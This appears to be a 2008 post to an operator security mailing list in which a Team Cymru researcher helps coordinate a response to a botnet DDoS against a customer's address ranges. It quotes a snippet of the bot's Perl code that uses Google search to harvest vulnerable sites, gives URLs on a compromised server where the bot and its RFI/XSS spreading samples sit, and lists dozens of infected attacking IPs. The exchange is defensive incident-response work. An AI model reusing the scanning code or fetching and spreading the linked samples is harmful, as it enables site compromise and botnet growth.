[nsp-sec] DDoS against 213.27.239.85 (paging L3+NTT)

Stephen Gill gillsr at cymru.com
Thu Jan 31 17:13:04 EST 2008 

BTW, google you might want to look at this address if you haven't already:

morgan.rx at gmail.com

They LOVE to use your search engine for scanning.

EG:

foreach $dom  (@dominios)^M
{^M
        push (@str,"@gstring");^M
}^M
^M
    my $query="www.google.com.ar/custom?q=";^M
    $query.=$str[(rand(scalar(@str)))];^M
    $query.="&num=$n&start=$s";^M
    my @lst=();^M
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query.""); ^M
    my $page = http_query($query);^M
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){^M
if ($1 !~ m/google|cache|translate/){^M
    push (@lst,$1);^M
}^M
    }^M
    return (@lst);^M

-- steve


On 1/31/08 3:08 PM, "Stephen Gill" <gillsr at cymru.com> wrote:

> Hey Nico,
> 
>> Yes, the customer has the following ranges (and got hit on all 3):
>> 
>> 213.27.150.168/29
>> 213.27.239.80/28
>> 213.27.146.180/30
> 
> Now they are attacking other Ips, so you can rest easy for a little bit :D.
> 
> Is it okay to have the botnet taken down?
> 
>> Thanks. Can the people with bots on the list try to get a copy of the
>> malware ?
> 
> Sure :)
> 
> ->> this is basically your attacker
> http://www.vsm.gov.tr/pwnd/bot.txt
> 
> ->> these samples were seen spreading via RFI/XSS attacks also present on the
> same host:
> 
> http://www.vsm.gov.tr/pwnd/http.txt

> http://www.vsm.gov.tr/pwnd/safe.gif

> http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt


> 
>>> If you'd like we can set the wayback machine for before 27 JAN 2008
>>> and see if there are any other attacks or discourse.
>> 
>> We only saw attacks this week so far, nothing in PFSP for the weeks
>> before.
> 
> Here is a list of current/actual attacking Ips connected to the botnet:
> 
> 701     | 74.85.126.2      | UUNET - MCI Communications Services, Inc. d/b/a
> Verizon Business
> 2819    | 212.65.242.233   | GTSCZ GTS NOVERA (GTS CZ)
> 2914    | 128.121.21.48    | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 2914    | 198.64.129.165   | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
> 3221    | 193.40.0.77      | EENet Autonomous System
> 3313    | 213.92.95.80     | INET-AS I.NET S.p.A.
> 3320    | 84.177.65.151    | DTAG Deutsche Telekom AG
> 3356    | 62.67.235.50     | LEVEL3 Level 3 Communications
> 3462    | 125.229.160.217  | HINET Data Communication Business Group
> 3561    | 72.232.12.234    | SAVVIS - Savvis
> 3561    | 72.36.152.194    | SAVVIS - Savvis
> 3561    | 72.36.225.130    | SAVVIS - Savvis
> 4266    | 12.130.64.131    | CERNET-ASN-BLOCK - California Education and
> Research Federation Network
> 4618    | 203.151.217.29   | INET-TH-AS Internet Thailand Company Limited
> 4713    | 219.163.200.103  | OCN NTT Communications Corporation
> 4713    | 219.163.200.92   | OCN NTT Communications Corporation
> 4713    | 219.163.200.94   | OCN NTT Communications Corporation
> 4713    | 219.163.5.182    | OCN NTT Communications Corporation
> 4713    | 219.163.5.188    | OCN NTT Communications Corporation
> 4713    | 221.186.251.79   | OCN NTT Communications Corporation
> 4713    | 221.186.251.87   | OCN NTT Communications Corporation
> 4713    | 60.32.201.102    | OCN NTT Communications Corporation
> 4741    | 210.246.192.133  | SAMART-BOARDER-AS Samart Corporation Co., Ltd.
> 4750    | 203.146.127.150  | CSLOXINFO-ISP-AS-AP CSLOXINFO Public Company
> Limited.
> 4750    | 203.146.140.172  | CSLOXINFO-ISP-AS-AP CSLOXINFO Public Company
> Limited.
> 4765    | 221.128.124.188  | WORLDNET-AS World Net & Services Co., Ltd.
> 4765    | 61.47.2.218      | WORLDNET-AS World Net & Services Co., Ltd.
> 6453    | 80.231.130.106   | GLOBEINTERNET Teleglobe America Inc.
> 7303    | 190.225.141.138  | Telecom Argentina S.A.
> 7303    | 200.43.222.198   | Telecom Argentina S.A.
> 7654    | 202.57.163.225   | SIAMGLOBE-AS-AP Internet Service Provider Co.,
> Ltd.
> 7693    | 203.155.19.67    | COMNET-TH KSC Commercial Internet Co. Ltd.
> 7738    | 189.24.125.110   | Telecomunicacoes da Bahia S.A.
> 7738    | 201.79.97.98     | Telecomunicacoes da Bahia S.A.
> 8167    | 200.203.183.62   | TELESC - Telecomunicacoes de Santa Catarina SA
> 8167    | 200.96.181.60    | TELESC - Telecomunicacoes de Santa Catarina SA
> 8342    | 81.176.226.50    | RTCOMM-AS RTComm.RU Autonomous System
> 8560    | 217.160.252.231  | ONEANDONE-AS 1&1 Internet AG
> 8560    | 87.106.68.155    | ONEANDONE-AS 1&1 Internet AG
> 8584    | 212.150.164.23   | BARAK Netvision 013 Barak - Barak Network
> 8708    | 82.76.253.82     | RDSNET RCS & RDS S.A.
> 9024    | 212.40.64.89     | DRAVANET-AS Dravanet Co Ltd.
> 9120    | 212.97.132.103   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.132.118   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.132.130   | COHAESIONET Cohaesio A/S
> 9120    | 212.97.134.11    | COHAESIONET Cohaesio A/S
> 9600    | 218.216.67.40    | SONYTELECOM SONY CORPORATION
> 9931    | 61.7.225.34      | CAT-AP The Communication Authoity of Thailand,
> CAT
> 10481   | 200.32.8.16      | Prima S.A.
> 11351   | 69.207.1.21      | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
> 12129   | 66.51.147.10     | 123NET - Internet 123
> 12594   | 212.40.96.82     | EXTERNET-AS EXTERNET Autonomus System
> 12876   | 195.154.77.64    | AS12876 Telecom Italia France
> 14992   | 209.200.117.138  | CRYSTALTECH - CrystalTech Web Hosting Inc.
> 15857   | 84.40.155.152    | DIALOG-AS DIALOG-NET Autonomuos System
> 16301   | 213.148.182.69   | DATACOM-AS Novgorod Datacom Autonomous System
> 16814   | 200.68.98.226    | NSS S.A.
> 17676   | 219.101.229.138  | GIGAINFRA BB TECHNOLOGY Corp.
> 18403   | 210.245.120.6    | FPT-AS-AP The Corporation for Financing &
> Promoting Technology
> 18479   | 189.14.101.1     | Plug-In Vanet Sistemas de Comunicao LTDA
> 18479   | 189.14.101.4     | Plug-In Vanet Sistemas de Comunicao LTDA
> 20312   | 150.187.103.20   | CNTI-REACCIUN
> 20312   | 150.187.25.5     | CNTI-REACCIUN
> 21470   | 81.17.72.133     | SWISP-AS Data Centre and ISP SWT Networks Limited
> Communications House Moor
> 23974   | 202.143.176.197  | MOE-EDNET-AS-AP Ministry of education
> 23974   | 203.172.180.250  | MOE-EDNET-AS-AP Ministry of education
> 24806   | 81.2.194.152     | INTERNET-CZ INTERNET CZ, a.s.,
> 25137   | 81.92.211.4      | NFSI NFSi Telecom, Lda.
> 25653   | 69.72.161.50     | FORTRESSITX - FortressITX
> 28590   | 201.54.26.98     | Neovia Telecomunicacoes S.A.
> 29208   | 82.119.225.27    | DIALTELECOM-AS Dial Telecom A.S., Bratislava
> 29300   | 82.148.187.66    | DIRECTCONNECT-AS Direct Connect, ISP, Norway
> 33660   | 75.145.57.237    | DNEO-OSP7 - Comcast Cable Communications, Inc.
> 39134   | 88.212.201.3     | SKYMEDIA Sky-Media Ltd. AS number
> 41003   | 194.153.116.180  | IP-INTERACTIVE IP-Interactive Colocation / IP
> Transit Provider
> 41126   | 89.111.180.245   | CENTROHOST-AS JSC Centrohost
> 
> Cheers,
> Steve, Team Cymru.

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 312 924 4023 | gillsr at cymru.com

More information about the nsp-security mailing list